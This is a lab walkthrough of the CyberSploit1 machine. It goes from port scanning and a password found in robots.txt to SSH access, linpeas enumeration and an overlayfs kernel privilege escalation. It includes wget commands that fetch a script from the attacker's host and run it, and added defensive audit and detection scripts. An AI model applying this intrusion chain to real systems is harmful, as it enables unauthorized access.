
# CyberSploit1

## nmap

```
(base) [psdon@arch CyberSploit1]$ mkdir nmap
(base) [psdon@arch CyberSploit1]$ sudo rustscan -a 192.168.217.92 --ulimit 5000 -t 2000 -- -T4 -A -oA nmap/all-ports-service-scan                                                                                    
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.                                                                                                                                                             
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |                                                                                                                                                             
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |                                                                                                                                                             
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'                                                                                                                                                             
The Modern Day Port Scanner.                                                                                                                                                                                         
________________________________________                                                                                                                                                                             
: https://discord.gg/GFrQsGy           :                                                                                                                                                                             
: https://github.com/RustScan/RustScan :                                                                                                                                                                             
 --------------------------------------                                                                                                                                                                              
Real hackers hack time ⌛                                                                                                                                                                                             
                                                                                                                                                                                                                     
[~] The config file is expected to be at "/root/.rustscan.toml"                                                                                                                                                      
[~] Automatically increasing ulimit value to 5000.                                                                                                                                                                   
Open 192.168.217.92:22                                                                                                                                                                                               
Open 192.168.217.92:80 
```

A web server on port 80 is open.

<div align="left"><img src="/files/-Mi3GRG8BBcHojG2T6c2" alt=""></div>

Let's check the source code of the page, where we can find a possible username.

<div align="left"><img src="/files/-Mi3Gb4MCU_flzKqZrK1" alt=""></div>

Let's also check `robots.txt`. As you can see, it contains a base64-encoded string.

<div align="left"><img src="/files/-Mi3H3HutbbmcnbX3wKO" alt=""></div>

We can decode it by executing the following command:

```
(base) [psdon@arch CyberSploit1]$ echo Y3liZXJzcGxvaXR7eW91dHViZS5jb20vYy9jeWJlcnNwbG9pdH0= | base64 --decode                                                                                                        
cybersploit{youtube.com/c/cybersploit}
```
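From the defender's side, both findings above can be caught before a site is published. The following is an added example, not part of the original writeup: it scans served text files for base64 tokens that decode to printable text and for leftover HTML comments. The file names, the `exampleuser` comment and the JavaScript line are constructed; only the `robots.txt` value is the string from this page.

```python
import base64
import binascii
import re

# Base64 runs of at least 16 characters with optional padding, not part of a longer run.
B64_TOKEN = re.compile(r"(?<![A-Za-z0-9+/=])[A-Za-z0-9+/]{16,}={0,2}(?![A-Za-z0-9+/=])")
HTML_COMMENT = re.compile(r"<!--(.*?)-->", re.DOTALL)


def decode_if_text(token):
    """Return the decoded text if token is valid base64 of printable ASCII, else None."""
    if len(token) % 4:
        return None
    try:
        raw = base64.b64decode(token, validate=True)
        text = raw.decode("ascii")
    except (binascii.Error, ValueError):
        # Invalid base64, or bytes that are not ASCII (UnicodeDecodeError is a ValueError).
        return None
    return text if text.isprintable() else None


def audit(files):
    """files maps path -> content. Returns a list of (path, kind, detail) findings."""
    findings = []
    for path, content in files.items():
        for match in B64_TOKEN.finditer(content):
            text = decode_if_text(match.group(0))
            if text is not None:
                findings.append((path, "base64-text", text))
        for match in HTML_COMMENT.finditer(content):
            note = match.group(1).strip()
            if note:
                findings.append((path, "html-comment", note))
    return findings


# Constructed sample webroot. The long identifier in app.js looks like base64
# but decodes to non-ASCII bytes, so it is not reported.
SAMPLE = {
    "robots.txt": "Y3liZXJzcGxvaXR7eW91dHViZS5jb20vYy9jeWJlcnNwbG9pdH0=\n",
    "index.html": "<html><body><h1>Welcome</h1>\n<!-- username: exampleuser -->\n</body></html>",
    "app.js": "function initializeApplicationStateV2() { return 1; }\n",
}

if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print(finding)
```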

## Exploitation

Let's try to log in over SSH with the username `itsskv`, using the decoded string as the password.

```
(base) [psdon@arch nikto]$ ssh itsskv@192.168.217.92                                                      
This key is not known by any other names                                                                  
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes                                  
Warning: Permanently added '192.168.217.92' (ECDSA) to the list of known hosts.                           
itsskv@192.168.217.92's password: cybersploit{youtube.com/c/cybersploit}                                                                          
itsskv@cybersploit-CTF:~$   
```

Looks like we have successfully gained an initial shell. Sweet :D

## Post Exploitation

First, let's transfer `linpeas.sh` from our machine to the target machine.

```
(base) [psdon@arch CyberSploit1]$ cd /opt/peass/linPEAS/                                                  
(base) [psdon@arch linPEAS]$ ls                                                                           
builder  images  linpeas.sh  README.md                                                                    
(base) [psdon@arch linPEAS]$ sudo python -m http.server 80                                                
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 
```

You can find the IP address of our machine (the `tun0` interface) by executing the following.

```
(base) [psdon@arch CyberSploit1]$ ip a | grep tun
5: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
    inet 192.168.49.217/24 scope global tun0
(base) [psdon@arch CyberSploit1]$
```

Then transfer the script using `wget`:

```
itsskv@cybersploit-CTF:~$ wget http://192.168.49.217/linpeas.sh                                                                                                                                                      
--2021-08-27 02:16:13--  http://192.168.49.217/linpeas.sh                                                                                                                                                            
Connecting to 192.168.49.217:80... connected.                                                                                                                                                                        
HTTP request sent, awaiting response... 200 OK                                                                                                                                                                       
Length: 458110 (447K) [application/x-sh]                                                                                                                                                                             
Saving to: `linpeas.sh'                                                                                                                                                                                              
                                                                                                                                                                                                                     
100%[================================================================>] 4,58,110     147K/s   in 3.0s                                                                                                                
                                                                                                                                                                                                                     
2021-08-27 02:16:17 (147 KB/s) - `linpeas.sh' saved [458110/458110]                                                                                                                                                  
                                                                                                                                                                                                                                                                                                                                                                                   
itsskv@cybersploit-CTF:~$ chmod +x linpeas.sh 
```

And now we can run `linpeas.sh`:

```
itsskv@cybersploit-CTF:~$ ./linpeas.sh                                                                                                                                                                               
                                                                                                                                                                                                                     
                                                                                                                                                                                                                     
                            ▄▄▄▄▄▄▄▄▄▄▄▄▄▄                                                                                                                                                                           
                    ▄▄▄▄▄▄▄             ▄▄▄▄▄▄▄▄                                                                                                                                                                     
             ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄                                                                                                                                                                 
         ▄▄▄▄     ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄                                                                                                                                                            
         ▄    ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄                                                                                                                                                          
         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄       ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄                                                                                                                                                          
         ▄▄▄▄▄▄▄▄▄▄▄          ▄▄▄▄▄▄               ▄▄▄▄▄▄ ▄                                                                                                                                                          
         ▄▄▄▄▄▄              ▄▄▄▄▄▄▄▄                 ▄▄▄▄                                                                                                                                                           
         ▄▄                  ▄▄▄ ▄▄▄▄▄                  ▄▄▄                                                                                                                                                          
         ▄▄                ▄▄▄▄▄▄▄▄▄▄▄▄                  ▄▄                                                                                                                                                          
         ▄            ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄   ▄▄                                                                                                                                                          
         ▄      ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄                                                                                                                                                          
         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄                                ▄▄▄▄                                                                                                                                                          
         ▄▄▄▄▄  ▄▄▄▄▄                       ▄▄▄▄▄▄     ▄▄▄▄                                                                                                                                                          
         ▄▄▄▄   ▄▄▄▄▄                       ▄▄▄▄▄      ▄ ▄▄                                                                                                                                                          
         ▄▄▄▄▄  ▄▄▄▄▄        ▄▄▄▄▄▄▄        ▄▄▄▄▄     ▄▄▄▄▄                                                                                                                                                          
         ▄▄▄▄▄▄  ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄   ▄▄▄▄▄                                                                                                                                                           
          ▄▄▄▄▄▄▄▄▄▄▄▄▄▄        ▄          ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄                                                                                                                                                           
         ▄▄▄▄▄▄▄▄▄▄▄▄▄                       ▄▄▄▄▄▄▄▄▄▄▄▄▄▄                                                                                                                                                          
         ▄▄▄▄▄▄▄▄▄▄▄                         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄                                                                                                                                                          
         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄            ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄                                                                                                                                                          
          ▀▀▄▄▄   ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀                                                                                                                                                           
               ▀▀▀▄▄▄▄▄      ▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▀▀                                                                                                                                                                    
                     ▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀                                                                                                                                                                         
                                                                                                                                                                                                                     
      /---------------------------------------------------------------------------\                                                                                                                                  
      |                             Do you like PEASS?                            |                                                                                                                                  
      |---------------------------------------------------------------------------|                                                                                                                                  
      |         Become a Patreon    :     https://www.patreon.com/peass           |                                                                                                                                  
      |         Follow on Twitter   :     @carlospolopm                           |                                                                                                                                  
      |         Respect on HTB      :     SirBroccoli & makikvues                 |                                                                                                                                  
      |---------------------------------------------------------------------------|                                                                                                                                  
      |                                 Thank you!                                |                                                                                                                                  
      \---------------------------------------------------------------------------/                                                                                                                                  
        linpeas-ng by carlospolop
```

Right off the bat, you can see the version of the Linux kernel it is running.

<div align="left"><img src="/files/-Mi3MPM0t9x5zBOh4KKj" alt=""></div>

We can check this Linux kernel version with `searchsploit`, and I found out it is vulnerable to the **overlayfs** exploit.

<div align="left"><img src="/files/-Mi3N0lt7VucqxfdbG-1" alt=""></div>

## Privilege Escalation

Let's mirror the exploit to our current working directory and copy the content of the file to the clipboard.

<div align="left"><img src="/files/-Mi3Nl-TVx3p9Slz2kHa" alt=""></div>

```
xclip -selection clipboard -i < 37292.c
```

Then paste it into a new file on the target machine:

```
nano e.c
```

<div align="left"><img src="/files/-Mi3OVdg3peGpuw_Ch2D" alt=""></div>

We can compile the C source code using the `gcc` binary installed on the target machine. Right after running the exploit, we got root on the target machine.

<div align="left"><img src="/files/-Mi3OnbN9Rvq5c8FDJva" alt=""></div>
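The post-exploitation steps above leave a recognizable trail in process-execution logs: a file is fetched over HTTP and then run, and a non-root user compiles a program and runs the result. The following is an added example, not part of the original writeup, that flags both sequences. The `HH:MM:SS user command` record format is hypothetical, and the sample records are constructed (the page shows the compile step only as a screenshot, so `gcc e.c -o e` is an assumption).

```python
import os
import shlex

DOWNLOADERS = {"wget", "curl"}
COMPILERS = {"gcc", "cc", "clang"}


def detect(lines):
    """lines: 'HH:MM:SS user command...' records. Returns (time, user, rule, path) alerts."""
    origin = {}  # (user, file name) -> "download" or "compile"
    alerts = []
    for line in lines:
        ts, user, cmdline = line.split(" ", 2)
        argv = shlex.split(cmdline)
        prog = os.path.basename(argv[0])
        if prog in DOWNLOADERS:
            for arg in argv[1:]:
                if arg.startswith(("http://", "https://")):
                    # Approximation: assume the file is saved under the URL's base name.
                    origin[(user, os.path.basename(arg))] = "download"
        elif prog in COMPILERS and user != "root":
            out = argv[argv.index("-o") + 1] if "-o" in argv[:-1] else "a.out"
            origin[(user, os.path.basename(out))] = "compile"
        elif "/" in argv[0] and (user, prog) in origin:
            # A path-qualified execution of a file this user just fetched or built.
            alerts.append((ts, user, origin[(user, prog)] + "-then-execute", argv[0]))
    return alerts


# Constructed records modelled on the steps in this writeup, plus a root build
# that should not alert.
SAMPLE = [
    "02:16:13 itsskv wget http://192.168.49.217/linpeas.sh",
    "02:16:20 itsskv chmod +x linpeas.sh",
    "02:16:25 itsskv ./linpeas.sh",
    "02:30:02 itsskv nano e.c",
    "02:31:10 itsskv gcc e.c -o e",
    "02:31:15 itsskv ./e",
    "02:40:00 root gcc build.c -o build",
    "02:40:05 root ./build",
]

if __name__ == "__main__":
    for alert in detect(SAMPLE):
        print(alert)
```

On a production host that has no reason to carry a compiler, removing `gcc` closes the compile-on-target path entirely, and patching the kernel removes the underlying flaw.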

Thanks, and enjoy! :D

